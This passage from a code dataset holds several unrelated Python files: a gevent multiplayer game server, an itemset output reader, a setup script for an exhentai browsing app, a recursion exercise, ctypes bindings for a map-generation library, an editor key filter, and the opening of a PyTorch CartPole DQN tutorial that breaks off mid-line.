room_id = data[\"data\"][0]\n socket_reader.poll(None)\n sock = socket.fromfd(reduction.recv_handle(socket_reader), socket.AF_INET, socket.SOCK_STREAM)\n observer_queue[room_id].append(sock)\n\ndef worker_read(db):\n while True:\n gevent.sleep(0.5)\n db.save_data()\n\ndef worker(socket_reader, data_reader, room_end_queue):\n db = mysql.Mysql()\n observer_queue = defaultdict(list)\n tasks = [\n gevent.spawn(worker_main, socket_reader, data_reader, room_end_queue, db, observer_queue),\n 
gevent.spawn(worker_read, db),\n ]\n gevent.joinall(tasks)\n \nclass WorkerControler():\n def __init__(self, room_end_queue):\n self.socket_r, self.socket_w = multiprocessing.Pipe()\n self.data_r, self.data_w = gipc.pipe()\n self.p = gipc.start_process(target=worker, args=(self.socket_r, self.data_r, room_end_queue))\n\n def dispatch(self, room):\n self.data_w.put(dict(info=\"room\", data=[room.room_id, room.room_number, room.game_number, room.names, room.is_ai, room.save_db]))\n for sock in room.socks:\n reduction.send_handle(self.socket_w, sock.fileno(), self.p.pid)\n\n def dispatch_observer(self, sock, room_id):\n self.data_w.put(dict(info=\"observer\", data=[room_id]))\n reduction.send_handle(self.socket_w, sock.fileno(), self.p.pid)\n\nclass Room():\n def __init__(self, room_id, room_number, game_number, bots, control_id, is_ai, save_db):\n self.socks = []\n self.names = []\n self.room_number = room_number\n self.game_number = game_number\n self.room_id = room_id\n self.bots = bots\n self.notify_bot_done = False\n self.control_id = control_id\n self.is_ai = is_ai\n self.save_db = save_db\n\n def add_player(self, sock, name):\n self.socks.append(sock)\n self.names.append(name)\n \n def full(self):\n return len(self.socks) == self.room_number\n \n def notify_bots(self, supported_agent, rb):\n if self.notify_bot_done:\n return True, None\n self.notify_bot_done = True \n count = defaultdict(int)\n for bot in self.bots:\n if bot not in supported_agent:\n return False, bot\n for bot in self.bots:\n count[bot] += 1\n suffix = \"\" if count[bot] == 1 else str(count[bot] - 1) \n info = dict(\n room_id=self.room_id,\n room_number=self.room_number,\n game_number=self.game_number,\n bot_name=bot,\n bot_name_suffix=suffix,\n server=cfg[\"ext_server\"][\"host\"],\n port=cfg[\"ext_server\"][\"port\"],\n no_gpu=0\n )\n rb.send_msg_to_queue(bot, json.dumps(info))\n return True, None\n\n def dismiss(self, info):\n for sock in self.socks:\n if info is not None:\n utils.sendJson(sock, info)\n try:\n sock.shutdown(socket.SHUT_RDWR)\n except Exception:\n pass\n sock.close()\n\nclass Listener():\n def __init__(self, address, port, controlers, room_end_queue, agent_error_queue):\n self.s = socket.socket()\n self.s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n self.s.bind((address, port))\n self.s.listen(100)\n self.controlers = controlers\n self.rooms = {}\n self.cur_control = 0\n self.db = mysql.Mysql()\n self.rb = rabbitmq.Rabbitmq()\n self.room_end_queue = room_end_queue\n self.agent_error_queue = agent_error_queue\n self.supported_agent = self.db.agents\n\n def run(self):\n tasks = [\n gevent.spawn(self.clear_room),\n gevent.spawn(self.recv_user),\n gevent.spawn(self.update_agent_list)\n ]\n gevent.joinall(tasks)\n\n @utils.run_forever\n @utils.catch_exception\n def update_agent_list(self):\n self.db.update_agent()\n self.supported_agent = self.db.agents\n gevent.sleep(20)\n\n @utils.run_forever\n @utils.catch_exception\n def clear_room(self):\n while not self.room_end_queue.empty():\n room_id = self.room_end_queue.get()\n if room_id in self.rooms:\n del self.rooms[room_id]\n \n while not self.agent_error_queue.empty():\n msg = self.agent_error_queue.get()\n room_id = msg[\"room_id\"]\n bot_name = msg[\"bot_name\"]\n if room_id in self.rooms:\n self.rooms[room_id].dismiss(hint.no_enough_resource_info(bot_name))\n del self.rooms[room_id]\n gevent.sleep(1)\n\n @utils.run_forever\n @utils.catch_exception\n def recv_user(self):\n conn, addr = self.s.accept()\n logger.debug(\"accept user {}:{}\", 
addr[0], addr[1])\n if addr[0] != cfg[\"ext_server\"][\"host\"]:\n self.tear_down(conn)\n logger.warning(\"Strange connection!!!\")\n return\n gevent.spawn(self.recv_data_run, conn, addr)\n\n def recv_data_run(self, conn, addr):\n try:\n self.recv_data(conn, addr)\n except Exception as e:\n self.tear_down(conn, hint.unknown_error_info(repr(e)))\n logger.exception(e)\n\n def recv_data(self, conn, addr):\n logger.debug(\"Start Recving {} {}\".format(addr[0], addr[1]))\n data = utils.recvJson(conn)\n logger.info(\"{}:{}, {}\", addr[0], addr[1], data)\n info = itemgetter(\"info\")(data)\n \n if info == \"connect\":\n room_id, name, room_number, bots, game_number = itemgetter(\"room_id\", \"name\", \"room_number\", \"bots\", \"game_number\")(data)\n room_id = int(room_id)\n room = self.get_room(room_id, room_number, game_number, bots)\n if room.full():\n self.tear_down(conn, hint.room_full_info(room_id))\n return\n room.add_player(conn, name)\n succ, agent_name = room.notify_bots(self.supported_agent, self.rb)\n if not succ:\n self.tear_down(conn, hint.agent_not_found_info(agent_name))\n del self.rooms[room_id]\n return \n if room.full():\n self.controlers[room.control_id].dispatch(room)\n \n if info == \"observer\":\n room_id = int(itemgetter(\"room_id\")(data))\n if room_id not in self.rooms:\n self.tear_down(conn, hint.room_not_exist_info(room_id))\n return\n room = self.rooms[room_id]\n self.controlers[room.control_id].dispatch_observer(conn, room_id)\n\n if info == \"ai_vs_ai\":\n room_id, room_number, bots, game_number = itemgetter(\"room_id\", \"room_number\", \"bots\", \"game_number\")(data)\n room_id = int(room_id)\n room = self.get_room(room_id, room_number, game_number, bots, True)\n if room.full():\n self.tear_down(conn, hint.room_full_info(room_id))\n return\n succ, agent_name = room.notify_bots(self.supported_agent, self.rb)\n if not succ:\n self.tear_down(conn, hint.agent_not_found_info(agent_name))\n del self.rooms[room_id]\n return\n self.controlers[room.control_id].dispatch_observer(conn, room_id)\n \n def tear_down(self, conn, info=None):\n # logger.warning(info)\n if info is not None:\n utils.sendJson(conn, info)\n try:\n conn.shutdown(socket.SHUT_RDWR)\n except Exception:\n pass\n conn.close()\n\n def get_room(self, room_id, room_number, game_number, bots, is_ai=False, save_db=True):\n if room_id > 20000 or room_id < 5000:\n save_db = False\n if room_id not in self.rooms:\n self.rooms[room_id] = Room(room_id, room_number, game_number, bots, self.cur_control, is_ai, save_db)\n self.cur_control += 1\n self.cur_control %= len(self.controlers)\n return self.rooms[room_id]\n\nclass Receiver(multiprocessing.Process):\n def __init__(self, agent_error_queue):\n super().__init__()\n self.agent_error_queue = agent_error_queue\n self.rb = rabbitmq.Rabbitmq()\n self.rb.recv_msg_from_queue(\"agent_error_queue\", self.agent_error_call_back)\n \n def agent_error_call_back(self, ch, method, props, body):\n msg = json.loads(body)\n logger.info(msg)\n self.agent_error_queue.put(msg)\n \n def run(self):\n self.rb.start()\n \ndef main():\n room_end_queue = multiprocessing.Queue()\n controlers = [\n WorkerControler(room_end_queue)\n for i in range(cfg[\"num_workers\"])\n ]\n agent_error_queue = multiprocessing.Queue()\n\n listener = Listener(cfg[\"server\"][\"host\"], cfg[\"server\"][\"port\"], controlers, room_end_queue, agent_error_queue)\n Receiver(agent_error_queue).start()\n\n\n listener.run()\n \nif __name__ == '__main__':\n 
main()","sub_path":"multi_gev_server/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":16795,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"72114344","text":"#!/usr/bin/python\n\nimport sys\n\ndef frequentItemsets (outFileName, numVars):\n with open(outFileName, 'r') as outFile:\n itemsets = set()\n for line in outFile:\n items = [int(i) for i in line.split()]\n itemset = [-1] * numVars\n for var in range(numVars):\n if var in items:\n itemset[var] = 1\n else:\n itemset[var] = 2\n itemsets.add(tuple(itemset))\n return itemsets\n\ndef main():\n if len(sys.argv) != 3:\n print (\"Usage: {} [LCM_Output] [#items]\".format(sys.argv[0]))\n exit (1)\n numVars = int (sys.argv[2])\n fiList = frequentItemsets(sys.argv[1], numVars)\n print (\"number of items: {}\".format(numVars))\n for itemset in fiList:\n print (\"{}\".format(itemset))\n\nif __name__ == '__main__':\n main()\n","sub_path":"utils/CompareWithSampling/readLCMOutput.py","file_name":"readLCMOutput.py","file_ext":"py","file_size_in_byte":856,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"111160779","text":"import json\nimport os\nimport shutil\n\nimport console\nimport dialogs\nimport ui\n\nfrom parse.exhentaiparser import renew, renew_account, ExhentaiParser\nfrom core.database import create_db\nfrom conf.config import CONFIGPATH, COOKIE_FILE\n\ndef is_suitable_device():\n a, b = ui.get_screen_size()\n if a == 1024 and b == 768 or b == 1024 and a == 768:\n return True\n \ndef init_config():\n if os.path.exists(CONFIGPATH):\n os.remove(CONFIGPATH)\n shutil.copy(CONFIGPATH + '.example', CONFIGPATH)\n \ndef get_favcat():\n parser = ExhentaiParser(\n cookies_dict=json.loads(open(COOKIE_FILE).read())\n )\n url = 'https://exhentai.org/favorites.php'\n t = parser.get_list_infos(url)\n with open(CONFIGPATH, encoding='utf-8') as f:\n config = json.loads(f.read())\n config['favcat_nums_titles'] = t['favcat_nums_titles']\n config['favorites_order_method'] = t['favorites_order_method']\n text = json.dumps(config, indent=2, sort_keys=True)\n with open(CONFIGPATH, 'w', encoding='utf-8') as f:\n f.write(text)\nipadpro_iphone_warning = \"未针对此设备调整UI\"\n\nchoices_list = [\n 'exhentai��啥?',\n '我有刚注册的e-hentai账号但还不能进入exhentai',\n '我有exhentai账号但没有Multi-Page Viewer的Hath Perk',\n '我有exhentai账号而且有Multi-Page Viewer的Hath Perk'\n ]\n \nmanual = [\n \"绅士的隐蔽乐园,请于表站e-hentai.org注册账号,刚注册账号不能访问exhentai.org,需要等待2星期左右\",\n \"刚注册账号不能访问exhentai.org,需要等待2星期左右\",\n \"请去https://e-hentai.org/hathperks.php点亮Multi-Page Viewer的Hath Perk,需要300Hath币或捐款100美元\"\n ]\n\ndef welcome():\n if not is_suitable_device():\n console.hud_alert(ipadpro_iphone_warning, 'error')\n t = dialogs.list_dialog(\n title=\"最符合你状况的描述是:\",\n items=choices_list,\n multiple=False)\n if t == choices_list[0]:\n console.alert(manual[0])\n elif t == choices_list[1]:\n console.alert(manual[1])\n elif t == choices_list[2]:\n console.alert(manual[2])\n elif t == choices_list[3]:\n username, password = console.login_alert('请输入账号密码')\n if username and password:\n renew_account(username, password)\n renew()\n init_config()\n create_db()\n get_favcat()\n \n \n","sub_path":"core/welcome.py","file_name":"welcome.py","file_ext":"py","file_size_in_byte":2457,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"504569189","text":"\"\"\"\n정수 n이 입력으로 들어오면 1부터 n까지의 합을 구하시오.\n\n\n입력\n입력으로 자연수 n이 입력된다. 
(1<=n<=10,000)\n\n출력\n1부터 n까지의 합을 출력한다.\n\n입력 예시\n100\n\n출력 예시\n5050\n\n\n\"\"\"\n\nimport sys\ninput = lambda : sys.stdin.readline().rstrip()\n\n\ndef recur1(k):\n if k==1:\n return 1\n else:\n return recur(k-1) + k # O(n)\n\n\ndef recur(k):\n if k==1:\n return 1\n else:\n return 2 * recur(k//2) + ((k+1)//2) * ((k+1)//2) # O(lgn)\n\nn = int(input())\n\nprint(recur(n))","sub_path":"코드업/재귀/codeup1905_1부터n까지합구하기.py","file_name":"codeup1905_1부터n까지합구하기.py","file_ext":"py","file_size_in_byte":550,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"359956766","text":"\nfrom ctypes import *\n\n_library = None\n\n_possible_library_names = [\n 'butterfly.dll', # Generic Windows DLL\n './libbutterfly.so', # Local Linux SO\n './libbutterfly.dylib', # Local OS X dylib\n './butterfly.so', # Local Linux SO w/o prefix\n 'libbutterfly.so', # System Linux SO\n 'libbutterfly.dylib', # System OS X dylib\n 'butterflyso' # System Linux SO w/o prefix\n]\nfor name in _possible_library_names:\n try:\n _library = CDLL(name)\n break\n except OSError:\n continue\n\nif _library is None:\n raise RuntimeError(\"butterfly library cannot be loaded.\")\n\nNARGS = 5\nMAX_QUERY_RET = 2\n\nclass _bf_farm(Structure):\n _fields_ = [(\"spots\", POINTER(c_int)),\n (\"width\", c_int),\n (\"height\", c_int),\n (\"seed\", c_int),\n (\"last_dangerous\", c_int),\n (\"max_cancels\", c_int),\n\n (\"is_init\", c_int),\n (\"rng_state\", c_void_p),\n (\"safe_spots\", c_void_p),\n (\"dangerous_spots\", c_void_p),\n (\"butterfly\", c_void_p),\n (\"error\", c_int)]\n\nclass _bf_instinct(Structure):\n _fields_ = [(\"action\", c_int),\n (\"args\", c_int * NARGS)]\n\nclass _bf_config(Structure):\n _fields_ = [(\"cancel_on_looking_at_safe\", c_int),\n (\"cancel_on_looking_at_safe_neighbor_4p\", c_int),\n (\"cancel_on_looking_at_safe_neighbor_4x\", c_int),\n (\"cancel_on_looking_at_safe_neighbor_8\", c_int),\n (\"cancel_on_looking_outside_farm\", c_int),\n (\"look_method\", c_int),\n (\"enable_neighbor_look_8\", c_int),\n (\"neighbor_look_8\", c_int),\n (\"enable_neighbor_look_4\", c_int),\n (\"neighbor_look_4\", c_int)]\n\n_library.bf_spawn.argtypes = [POINTER(_bf_farm), POINTER(_bf_instinct), c_size_t, POINTER(_bf_config)]\n_library.bf_spawn.restype = c_int\n_library.bf_commit.argtypes = [POINTER(_bf_farm)]\n_library.bf_random.argtypes = [POINTER(_bf_farm)]\n_library.bf_random.restype = c_double\n_library.bf_query.argtypes = [POINTER(_bf_farm), c_int, POINTER(c_int)]\n_library.bf_cleanup.argtypes = 
[POINTER(_bf_farm)]\n\nMORPH_AT_LAST_DEATH_SPOT,\\\nMORPH_AT_LAST_MORPH_SPOT,\\\nMORPH_AT_FIXED_SPOT,\\\nMORPH_AT_RANDOM_SPOT,\\\nMORPH_AT_RANDOM_SAFE_SPOT,\\\nMORPH_AT_RANDOM_DANGEROUS_SPOT,\\\nMORPH_AT_RANDOM_WEST_SPOT,\\\nMORPH_AT_RANDOM_EAST_SPOT,\\\nMORPH_AT_RANDOM_NORTH_SPOT,\\\nMORPH_AT_RANDOM_SOUTH_SPOT,\\\nMORPH_AT_RANDOM_WEST_EDGE_SPOT,\\\nMORPH_AT_RANDOM_EAST_EDGE_SPOT,\\\nMORPH_AT_RANDOM_NORTH_EDGE_SPOT,\\\nMORPH_AT_RANDOM_SOUTH_EDGE_SPOT,\\\nMORPH_AT_RANDOM_WESTEAST_EDGE_SPOT,\\\nMORPH_AT_RANDOM_NORTHSOUTH_EDGE_SPOT,\\\nMORPH_AT_RANDOM_EDGE_SPOT,\\\nGOAL_FIXED_SPOT,\\\nGOAL_RANDOM_SPOT,\\\nGOAL_RANDOM_SAFE_SPOT,\\\nGOAL_RANDOM_DANGEROUS_SPOT,\\\nGOAL_RANDOM_WEST_SPOT,\\\nGOAL_RANDOM_EAST_SPOT,\\\nGOAL_RANDOM_NORTH_SPOT,\\\nGOAL_RANDOM_SOUTH_SPOT,\\\nGOAL_RANDOM_WEST_EDGE_SPOT,\\\nGOAL_RANDOM_EAST_EDGE_SPOT,\\\nGOAL_RANDOM_NORTH_EDGE_SPOT,\\\nGOAL_RANDOM_SOUTH_EDGE_SPOT,\\\nGOAL_RANDOM_WESTEAST_EDGE_SPOT,\\\nGOAL_RANDOM_NORTHSOUTH_EDGE_SPOT,\\\nGOAL_RANDOM_EDGE_SPOT,\\\nFLUTTER_STILL,\\\nFLUTTER_WEIGHTED_4,\\\nFLUTTER_WEIGHTED_8,\\\nFLUTTER_TUNNEL,\\\nFLUTTER_LINE,\\\nLOOK_NOWHERE,\\\nLOOK_EVERYWHERE,\\\nLOOK_1_AREA,\\\nLOOK_PLUS_AREA,\\\nLOOK_BIG_PLUS_AREA,\\\nLOOK_X_AREA,\\\nLOOK_BIG_X_AREA,\\\nLOOK_RECT_AREA,\\\nLOOK_SHRINKING_RECT_AREA,\\\nLOOK_CIRCLE_AREA,\\\nLOOK_SHRINKING_CIRCLE_AREA,\\\nLOOK_DIAMOND_AREA,\\\nLOOK_SHRINKING_DIAMOND_AREA,\\\nDIE_AT_FIXED_SPOT,\\\nDIE_AT_SAFE_SPOT,\\\nDIE_AT_DANGEROUS_SPOT,\\\nDIE_AT_GOAL,\\\nDIE_AFTER_N,\\\nDIE_ONE_IN = range(56)\n\nMETHOD_RANDOM,\\\nMETHOD_CYCLE,\\\nMETHOD_PICK = range(3)\n\nQUERY_SAFE_PERCENTAGE,\\\nQUERY_DANGEROUS_PERCENTAGE,\\\nQUERY_RANDOM_SAFE_SPOT,\\\nQUERY_RANDOM_DANGEROUS_SPOT,\\\nQUERY_LAST_DEATH_SPOT,\\\nQUERY_LAST_MORPH_SPOT = range(6)\n\nERROR_NONE,\\\nERROR_CANCEL,\\\nERROR_NO_DEATH,\\\nERROR_NO_MEM = range(4)\n\nclass Butterfly(object):\n\n def __init__(self, *instincts, **config):\n self._instincts = []\n self._config = _bf_config()\n self.set_instincts(instincts)\n self.set_opts(**config)\n\n def set_instincts(self, instincts):\n for i in instincts:\n if len(i) == 1:\n self.add_instinct(i[0])\n else:\n self.add_instinct(i[0], i[1])\n\n def add_instinct(self, action, args=[]):\n instinct = _bf_instinct(action, (c_int * NARGS)(*args))\n self._instincts.append(instinct)\n\n def clr_instincts(self):\n self._instincts = []\n\n def set_opts(self, **kwargs):\n for k, v in kwargs.items():\n setattr(self._config, k, v)\n\nclass Farm(object):\n\n def __init__(self, width, height, spots=None, seed=None):\n self._farm = _bf_farm()\n spots = spots or [0 for x in xrange(width * height)]\n self._farm.spots = (c_int * (width * height))(*spots)\n self._farm.width = width\n self._farm.height = height\n self._farm.seed = seed or 0\n self._farm.last_dangerous = 0\n self._farm.is_init = 0\n\n def last_dangerous(self, opt=None):\n if not opt:\n return self._farm.last_dangerous\n self._farm.last_dangerous = opt\n\n def max_cancels(self, opt=None):\n if not opt:\n return self._farm.max_cancels\n self._farm.max_cancels = opt\n\n def spawn_1(self, bfs, commit=False):\n if not isinstance(bfs, list):\n bfs = [bfs]\n for bf in bfs:\n length = len(bf._instincts)\n if length == 0:\n continue\n instincts = (_bf_instinct * length)(*bf._instincts)\n ret = _library.bf_spawn(self._farm, instincts, length, bf._config)\n # an error means everything fails until commit.\n if ret != ERROR_NONE:\n self.commit()\n return ret\n if commit:\n self.commit()\n return ERROR_NONE\n\n def spawn(self, bfs, ntimes=1, commit=False):\n if not isinstance(bfs, 
list):\n bfs = [bfs]\n ret = None\n for i in xrange(ntimes):\n ret = self.spawn_1(bfs, commit)\n return ret\n\n def commit(self):\n _library.bf_commit(self._farm)\n\n def random(self):\n return _library.bf_random(self._farm)\n\n def query(self, what):\n ret = (c_int * MAX_QUERY_RET)()\n _library.bf_query(self._farm, what, ret)\n return ret\n\n def cleanup(self):\n _library.bf_cleanup(self._farm)\n\n def width(self):\n return self._farm.width\n\n def height(self):\n return self._farm.height\n\n def seed(self):\n return self._farm.seed\n\n def spot_at(self, x, y):\n return self._farm.spots[y * self._farm.width + x]\n\n def safe_percentage(self):\n p = self.query(QUERY_SAFE_PERCENTAGE)\n return p[0] / 100.\n\n def dangerous_percentage(self):\n p = self.query(QUERY_DANGEROUS_PERCENTAGE)\n return p[0] / 100.\n\n def random_safe_spot(self):\n p = self.query(QUERY_RANDOM_SAFE_SPOT)\n return p[0], p[1]\n\n def random_dangerous_spot(self):\n p = self.query(QUERY_RANDOM_DANGEROUS_SPOT)\n return p[0], p[1]\n\n def last_death_spot(self):\n p = self.query(QUERY_LAST_DEATH_SPOT)\n return p[0], p[1]\n\n def last_morph_spot(self):\n p = self.query(QUERY_LAST_MORPH_SPOT)\n return p[0], p[1]\n\ndef random_1x1(tile):\n return Butterfly(*[\n [MORPH_AT_RANDOM_SPOT],\n [LOOK_1_AREA, [tile]],\n [DIE_AFTER_N, [1]]\n ])\n\ndef random_nxm(tile, n, m):\n return Butterfly(*[\n [MORPH_AT_RANDOM_SPOT],\n [LOOK_RECT_AREA, [tile, n, m]],\n [DIE_AFTER_N, [1]]\n ])\n","sub_path":"lib/butterfly.py","file_name":"butterfly.py","file_ext":"py","file_size_in_byte":7672,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"457151638","text":"import vaitk\nfrom vaitk import core, gui\n\nfrom . import flags\nimport logging\n\nclass EditAreaEventFilter(core.VObject):\n \"\"\"\n Event filter to detect the use of commandbar initiation\n keys, such as :, / and ?\n \"\"\"\n def __init__(self, command_bar):\n super().__init__()\n self._editor_model = None\n self._command_bar = command_bar\n\n def eventFilter(self, event):\n if not self._hasModel():\n return False\n\n if not isinstance(event, gui.VKeyEvent):\n return False\n\n if self._editor_model.mode != flags.COMMAND_MODE:\n return False\n\n if event.key() == vaitk.Key.Key_Colon:\n self._editor_model.mode = flags.COMMAND_INPUT_MODE\n self._command_bar.setMode(flags.COMMAND_INPUT_MODE)\n self._command_bar.setFocus()\n return True\n\n if event.key() == vaitk.Key.Key_Slash:\n self._editor_model.mode = flags.SEARCH_FORWARD_MODE\n self._command_bar.setMode(flags.SEARCH_FORWARD_MODE)\n self._command_bar.setFocus()\n return True\n\n if event.key() == vaitk.Key.Key_Question:\n self._editor_model.mode = flags.SEARCH_BACKWARD_MODE\n self._command_bar.setMode(flags.SEARCH_BACKWARD_MODE)\n self._command_bar.setFocus()\n return True\n\n if event.key() == vaitk.Key.Key_N and event.modifiers() & vaitk.KeyModifier.ControlModifier:\n self._buffer_list.selectNext()\n return True\n\n if event.key() == vaitk.Key.Key_P and event.modifiers() & vaitk.KeyModifier.ControlModifier:\n self._buffer_list.selectPrev()\n return True\n\n return False\n\n def setModels(self, editor_model, buffer_list):\n self._editor_model = editor_model\n self._buffer_list = buffer_list\n\n # Private\n\n def _hasModel(self):\n return self._editor_model is not None and self._buffer_list is not 
None\n\n\n","sub_path":"vai/EditAreaEventFilter.py","file_name":"EditAreaEventFilter.py","file_ext":"py","file_size_in_byte":1961,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"362776919","text":"# -*- coding: utf-8 -*-\n\"\"\"\n#############pytorch强化学习DQN 之Qlearning############\nCartpole模型说明:\n#观察值:Observation,观察值包含均布的随机值噪声+-0.5\n0:小车位置 -2.4~2.4\n1:小车速度 -Inf~Inf\n2:摆角度 -41.8~41.8\n3:摆角速度 -Inf~Inf\n#行为:Action\n0: 小车向左\n1: 小车向右\n#仿真结束条件:\n1.摆的角度不在+-12°\n2.小车的单位不在+-2.4\n3.episode 长度大于200\n关于本例中state,action,next_state,reward\nstate:为当前图片-上步的图片,差值可以考虑到速度\naction:shape=(1,1)的tensor,取值时需要action[0][0]\nnext_state:下步的状态\nreward:默认的reward都是1,停止也是1\n\"\"\"\n\nimport math\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport random\nfrom PIL import Image\nfrom collections import namedtuple\nfrom itertools import count\n\nimport gym\nimport numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nimport torchvision.transforms as T\nfrom torch.autograd import Variable\n\n# 创建倒立摆的环境,unwrapped可以获得环境内部参数,更方便进行深层次的操作\n# 如果上传代码到openai,必须去除这个函数,防作弊\nenv = gym.make('CartPole-v0').unwrapped\nis_ipython = 'inline' in matplotlib.get_backend()\nif is_ipython:\n from IPython import display\n\nplt.ion() # 开启交互模式,该模式下可显示多个图片(非阻塞),但只有调用plt.show()才会显示图片\n\n# if gpu is to be used\nuse_cuda = torch.cuda.is_available()\nFloatTensor = torch.cuda.FloatTensor if use_cuda else torch.FloatTensor\nLongTensor = torch.cuda.LongTensor if use_cuda else torch.LongTensor\nByteTensor = torch.cuda.ByteTensor if use_cuda else torch.ByteTensor\nTensor = FloatTensor\n\n######################################################################\n# Replay Memory\n# -------------\n#\n# We'll be using experience replay memory for training our DQN. It stores\n# the transitions that the agent observes, allowing us to reuse this data\n# later. By sampling from it randomly, the transitions that build up a\n# batch are decorrelated. It has been shown that this greatly stabilizes\n# and improves the DQN training procedure.\n#\n# For this, we're going to need two classses:\n#\n# - ``Transition`` - a named tuple representing a single transition in\n# our environment\n# - ``ReplayMemory`` - a cyclic buffer of bounded size that holds the\n# transitions observed recently. It also implements a ``.sample()``\n# method for selecting a random batch of transitions for training.\n#\n\n# 当前状态/行为/下个状态/收益\nTransition = namedtuple('Transition',\n ('state', 'action', 'next_state', 'reward'))\n\n\nclass ReplayMemory(object):\n def __init__(self, capacity):\n self.capacity = capacity\n self.memory = []\n self.position = 0\n\n def push(self, *args):\n \"\"\"Saves a transition.\"\"\"\n if len(self.memory) < self.capacity:\n self.memory.append(None)\n self.memory[self.position] = Transition(*args)\n # 超过capacity则循环重头开始覆盖\n self.position = (self.position + 1) % self.capacity\n\n def sample(self, batch_size):\n \"从下步可用状态中随机抽取N个\"\n return random.sample(self.memory, batch_size)\n\n def __len__(self):\n return len(self.memory)\n\n\n######################################################################\n# Now, let's define our model. But first, let quickly recap what a DQN is.\n#\n# DQN algorithm\n# -------------\n#\n# Our environment is deterministic, so all equations presented here are\n# also formulated deterministically for the sake of simplicity. 
In the\n# reinforcement learning literature, they would also contain expectations\n# over stochastic transitions in the environment.\n#\n# Our aim will be to train a policy that tries to maximize the discounted,\n# cumulative reward\n# :math:`R_{t_0} = \\sum_{t=t_0}^{\\infty} \\gamma^{t - t_0} r_t`, where\n# :math:`R_{t_0}` is also known as the *return*. The discount,\n# :math:`\\gamma`, should be a constant between :math:`0` and :math:`1`\n# that ensures the sum converges. It makes rewards from the uncertain far\n# future less important for our agent than the ones in the near future\n# that it can be fairly confident about.\n#\n# The main idea behind Q-learning is that if we had a function\n# :math:`Q^*: State \\times Action \\rightarrow \\mathbb{R}`, that could tell\n# us what our return would be, if we were to take an action in a given\n# state, then we could easily construct a policy that maximizes our\n# rewards:\n#\n# .. math:: \\pi^*(s) = \\arg\\!\\max_a \\ Q^*(s, a)\n#\n# However, we don't know everything about the world, so we don't have\n# access to :math:`Q^*`. But, since neural networks are universal function\n# approximators, we can simply create one and train it to resemble\n# :math:`Q^*`.\n#\n# For our training update rule, we'll use a fact that every :math:`Q`\n# function for some policy obeys the Bellman equation:\n#\n# .. math:: Q^{\\pi}(s, a) = r + \\gamma Q^{\\pi}(s', \\pi(s'))\n#\n# The difference between the two sides of the equality is known as the\n# temporal difference error, :math:`\\delta`:\n#\n# .. math:: \\delta = Q(s, a) - (r + \\gamma \\max_a Q(s', a))\n#\n# To minimise this error, we will use the `Huber\n# loss `__. The Huber loss acts\n# like the mean squared error when the error is small, but like the mean\n# absolute error when the error is large - this makes it more robust to\n# outliers when the estimates of :math:`Q` are very noisy. We calculate\n# this over a batch of transitions, :math:`B`, sampled from the replay\n# memory:\n#\n# .. math::\n#\n# \\mathcal{L} = \\frac{1}{|B|}\\sum_{(s, a, s', r) \\ \\in \\ B} \\mathcal{L}(\\delta) \n#\n# .. math::\n#\n# \\text{where} \\quad \\mathcal{L}(\\delta) = \\begin{cases}\n# \\frac{1}{2}{\\delta^2} & \\text{for } |\\delta| \\le 1, \\\\\n# |\\delta| - \\frac{1}{2} & \\text{otherwise.}\n# \\end{cases}\n#\n# Q-network\n# ^^^^^^^^^\n#\n# Our model will be a convolutional neural network that takes in the\n# difference between the current and previous screen patches. It has two\n# outputs, representing :math:`Q(s, \\mathrm{left})` and\n# :math:`Q(s, \\mathrm{right})` (where :math:`s` is the input to the\n# network). 
In effect, the network is trying to predict the *quality* of\n# taking each action given the current input.\n#\n\n\nclass DQN(nn.Module):\n '''输入为state,为2副相邻图像的插值,shape=1,3,40,80\n 输出为行为(0,1)的对应概率,代表左和右,bath_size=1,channel=3\n input=3,output=2\n '''\n\n def __init__(self):\n super(DQN, self).__init__()\n self.conv1 = nn.Conv2d(3, 16, kernel_size=5, stride=2)\n self.bn1 = nn.BatchNorm2d(16)\n self.conv2 = nn.Conv2d(16, 32, kernel_size=5, stride=2)\n self.bn2 = nn.BatchNorm2d(32)\n self.conv3 = nn.Conv2d(32, 32, kernel_size=5, stride=2)\n self.bn3 = nn.BatchNorm2d(32)\n self.head = nn.Linear(448, 2)\n\n def forward(self, x):\n x = F.relu(self.bn1(self.conv1(x)))\n x = F.relu(self.bn2(self.conv2(x)))\n x = F.relu(self.bn3(self.conv3(x)))\n return self.head(x.view(x.size(0), -1))\n\n\n######################################################################\n# Input extraction\n# ^^^^^^^^^^^^^^^^\n#\n# The code below are utilities for extracting and processing rendered\n# images from the environment. It uses the ``torchvision`` package, which\n# makes it easy to compose image transforms. Once you run the cell it will\n# display an example patch that it extracted.\n#\n\n# 转换获得的图片(ndarray)->3*320*160\n# 转换为PIL->缩小尺寸为80x40>转换为Tensor\nresize = T.Compose([T.ToPILImage(),\n T.Resize(40, interpolation=Image.CUBIC),\n T.ToTensor()])\n\n# This is based on the code from gym.\nscreen_width = 600\n\n\n# 获得小车当前state中心的像素位置\ndef get_cart_location():\n # env.x_threshold小车的X单向最大范围\n world_width = env.x_threshold * 2\n # 单个像素对应的距离\n scale = screen_width / world_width\n # state=x,speed_x,a,speed_a,state[0]=当前小车的x位置,起点为左侧边缘\n return int(env.state[0] * scale + screen_width / 2.0) # MIDDLE OF CART\n\n\n# 采集小车当前状态下的图片并裁剪大小为320*160,转换为(1,3,40,80)的Tensor\ndef get_screen():\n # 返回numpy_array,由于ndarray的分布为(row,clolumn,channel),需要转换为(channel,row,clolumn)\n # 对于该图片,由(400,600,3)->(3,400,600),pytorch的格式为CHW\n screen = env.render(mode='rgb_array').transpose((2, 0, 1))\n # 高度方向裁剪,只保留图片高度方向的中间部分,(3,400,600)->(3,160,600)\n screen = screen[:, 160:320]\n view_width = 320 # 视野宽度\n cart_location = get_cart_location()\n # //当0600-160,则mask=(-320,0)\n elif cart_location > (screen_width - 